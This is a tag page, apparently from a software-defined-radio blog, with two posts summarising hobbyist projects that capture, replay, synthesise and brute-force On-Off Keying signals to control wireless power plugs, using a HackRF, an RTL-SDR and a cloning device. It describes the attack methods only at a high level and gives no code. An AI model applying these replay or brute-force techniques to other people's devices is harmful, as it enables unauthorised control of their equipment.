Tagged: on off keying

Reverse Engineering or Brute Forcing Wireless Powerplug Remote Controls with a HackRF One

Over on his blog "Foo-Manroot" has created a post where he shows us how he can control a wirelessly controlled powerplug with his HackRF. These power plugs can be used to turn electrically devices on or off remotely, and their wireless protocol is often simple On-Off Keying (OOK) with little to no security.

Foo-Manroot first explains how easily capture and replay a signal with the HackRF. If the signal is simple without any security like rolling codes then a simple replay attack like this will allow the HackRF to control the device quite easily. In the next section he goes on to explain how to actually analyze and synthesize the packets yourself using Python and GNU Radio. Finally he also shows that a brute force attack can be applied once you know how to synthesize the signal. Brute forcing runs over every possible packet combination in a short time and this can be pretty fast for simple protocols like those used in wireless remote controls. His post also includes all the GNU Radio files required so it is easy for someone to replicate his work easily.

If you are interested in controlling simple OOK devices like a wireless powerplug with replay attacks then we have a tutorial for doing this with a simple RTL-SDR and Raspberry Pi running RpiTX which might be useful for those who don't have a HackRF.

HackRF Controlling the Wireless Power Outlet by Brute Forcing Packets
HackRF Controlling the Wireless Power Outlet by Brute Forcing Packets


Reverse Engineering Wireless Wall Outlets And Automatically Cloning OOK Signals

Wireless wall outlets are electrical outlets that can be turned on or off by a wireless remote. Fabien is an experimenter who was looking for a way to control the power of his home devices from a remote location using HTTP. He thought of building his own from scratch, but quickly realized that the device would need to be certified for insurance purposes. Instead he bought a cheap commercially made certified wireless wall outlet and reverse engineered the protocol using an RTL-SDR.

To do that he used the existing OOK-Decoder software available on GitHub. From the analysis provided by OOK-Decoder, Fabien was able to successfully reimplement the transmission using an AVR microcontroller and 433 MHz transceiver circuit from Sparkfun.

After being successful with this, Fabien decided to take the project a step further and create the OOKLONE – a device that could automatically clone any 433.92 MHz OOK signal and replay it. The video below shows the OOKLONE in action.